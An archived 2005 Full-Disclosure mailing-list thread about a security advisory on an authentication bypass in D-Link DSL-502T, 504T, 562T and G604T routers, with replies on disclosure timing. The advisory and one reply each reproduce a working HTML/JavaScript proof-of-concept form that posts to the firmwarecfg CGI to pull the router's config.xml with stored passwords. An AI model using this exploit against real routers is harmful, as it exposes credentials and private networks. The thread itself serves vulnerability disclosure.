D-Link DSL routers authentication bypass

Discussion:

(too old to reply)

Francesco Orro

2005-05-19 14:41:56 UTC

====================== SUMMARY ========================

Title: D-Link DSL routers authentication bypass
Date: 19 May 2005
Author: Francesco Orro <francesco.orro 4t akhela.com>

Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
Vendor: D-Link
Vendor URL: http://www.dlink.com
Vendor Status: D-Link was conctacted
Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
various firmwares versions
Risk: High
Impact: Unauthorized people may gain full access to the device

Vulnerability Description: an undocumented feature allows (in some
cases) to bypass the authentication prompt and gain full access to the
router, and than to the network behind it.

====================== BACKGROUND ========================

D-Link DSL routers are commonly used for internet connectivity for home
or small office needs. (http://www.dlink.com/products/)

=============== PROBLEM DESCRIPTION ==================

The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of the
file fw_ip under /var/tmp/. If this file exists, all IP addresses listed
inside it are given straight access to the device, without the need for
authentication. If this file doesn't exists, the CGI creates a new one,
putting the requesting address inside.

If the web configuration console is accessible from internet and if
nobody have never called the CGI before (es: from a workstation inside
the LAN), then everybody can gain access to the router, download the
config.xml file which contains users account and passwords, have access
to the private network, modify or alter the firmware of the router, etc.

================ ADDITIONAL DETAILS ==================

Vulnerability was found on the following firmware versions:

V1.00B01T16.EN.20040211
V1.00B01T16.EU.20040217
V0.00B01T04.UK.20040220
V1.00B01T16.EN.20040226
V1.00B02T02.EU.20040610
V1.00B02T02.UK.20040618
V1.00B02T02.EU.20040729
V1.00B02T02.DE.20040813
V1.00B02T02.RU.20041014

Can be exploited by a simple HTTP POST with the form:

<html>
<head>Download config.xml:<title>GetConfig - Config file
download</title></head>
<body>

<script lang="javascript">
function invia_richiesta()
{
        document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
        document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
         <input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form>

</body>
</html>

=================== FIX INFORMATION ===================

Actually there is no solution to problem due to the fact that it seems
an hidden feature.
The work around is to call the CGI /cgi-bin/firmwarecfg from a known
address of the local network and/or disable web console access from the
internet.

================ AUTHOR INFORMATION ================

Francesco Orro
Akhela S.r.l. - Operation Group
http://www.akhela.com/

EMail: francesco.orro 4t akhela.com
KeyID: 6CF46D45

=================== DISCLOSURE HISTORY =====================

2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
of the vulnerability;
5 May 2005 - The vendor replid that the problem was resolved on
firmware version V1.00B02T02.EU.20040610, but has been
demostrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.

Luis Peralta

2005-05-20 10:22:19 UTC

Permalink

Post by Francesco Orro
====================== SUMMARY ========================
Title: D-Link DSL routers authentication bypass
Date: 19 May 2005
Author: Francesco Orro <francesco.orro 4t akhela.com>
=================== DISCLOSURE HISTORY =====================
2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
of the vulnerability;
5 May 2005 - The vendor replid that the problem was resolved on
firmware version V1.00B02T02.EU.20040610, but has been
demostrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.

Hi,

I notified D-Link (***@dlink.es) about this issue (I only checked
it on G604T models) on April 11th. The bug does not only allow to
download the configuration file, but to completely trojanize the
device by means of custom firmware uploading. I gave D-Link a two
month grace period to fix the issue.

Regards,
--
Luis Peralta
http://spisa.act.uji.es/~peralta
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Francesco Orro

2005-05-20 10:51:58 UTC

Permalink

I found this vulnerability for my job last March. I immediately tried to
contact D-Link since i didn't trust the e-mail for ordinary technical
support. At the beginning of May I managed to submit to D-Link the
vulnerability and I received an answer as you find in the advisory.

Bye
Francesco Orro

Post by Luis Peralta

Post by Francesco Orro
====================== SUMMARY ========================
Title: D-Link DSL routers authentication bypass
Date: 19 May 2005
Author: Francesco Orro <francesco.orro 4t akhela.com>
=================== DISCLOSURE HISTORY =====================
2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
of the vulnerability;
5 May 2005 - The vendor replid that the problem was resolved on
firmware version V1.00B02T02.EU.20040610, but has been
demostrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.

Hi,
it on G604T models) on April 11th. The bug does not only allow to
download the configuration file, but to completely trojanize the
device by means of custom firmware uploading. I gave D-Link a two
month grace period to fix the issue.
Regards,
--
Luis Peralta
http://spisa.act.uji.es/~peralta

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Sebastian von Knorring

2005-05-20 14:05:03 UTC

Permalink

Hello.

Could the D-Link DI-604 story at

<http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

be related to this vulnerability?

I have myself also a DI-604 that broke down in exactly the same way as described
above and the above was the only similar case I have yet found on the net.

My suspicion was also that the box had been hacked and your vulnerability post
now shows that exploitable holes in D-Link boxes exist.

-Sebastian

Post by Francesco Orro
====================== SUMMARY ========================
Title: D-Link DSL routers authentication bypass
Date: 19 May 2005
Author: Francesco Orro <francesco.orro 4t akhela.com>
Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
Vendor: D-Link
Vendor URL: http://www.dlink.com
Vendor Status: D-Link was conctacted
Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
various firmwares versions
Risk: High
Impact: Unauthorized people may gain full access to the device
Vulnerability Description: an undocumented feature allows (in some
cases) to bypass the authentication prompt and gain full access to the
router, and than to the network behind it.
====================== BACKGROUND ========================
D-Link DSL routers are commonly used for internet connectivity for home
or small office needs. (http://www.dlink.com/products/)
=============== PROBLEM DESCRIPTION ==================
The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of the
file fw_ip under /var/tmp/. If this file exists, all IP addresses listed
inside it are given straight access to the device, without the need for
authentication. If this file doesn't exists, the CGI creates a new one,
putting the requesting address inside.
If the web configuration console is accessible from internet and if
nobody have never called the CGI before (es: from a workstation inside
the LAN), then everybody can gain access to the router, download the
config.xml file which contains users account and passwords, have access
to the private network, modify or alter the firmware of the router, etc.
================ ADDITIONAL DETAILS ==================
V1.00B01T16.EN.20040211
V1.00B01T16.EU.20040217
V0.00B01T04.UK.20040220
V1.00B01T16.EN.20040226
V1.00B02T02.EU.20040610
V1.00B02T02.UK.20040618
V1.00B02T02.EU.20040729
V1.00B02T02.DE.20040813
V1.00B02T02.RU.20041014
<html>
<head>Download config.xml:<title>GetConfig - Config file
download</title></head>
<body>
<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.
value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>
<form name="InputBox">
<br>http://<input Name="Host" type="text" v
value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form>
</body>
</html>
=================== FIX INFORMATION ===================
Actually there is no solution to problem due to the fact that it seems
an hidden feature.
The work around is to call the CGI /cgi-bin/firmwarecfg from a known
address of the local network and/or disable web console access from the
internet.
================ AUTHOR INFORMATION ================
Francesco Orro
Akhela S.r.l. - Operation Group
http://www.akhela.com/
EMail: francesco.orro 4t akhela.com
KeyID: 6CF46D45
=================== DISCLOSURE HISTORY =====================
2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
of the vulnerability;
5 May 2005 - The vendor replid that the problem was resolved on
firmware version V1.00B02T02.EU.20040610, but has been
demostrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.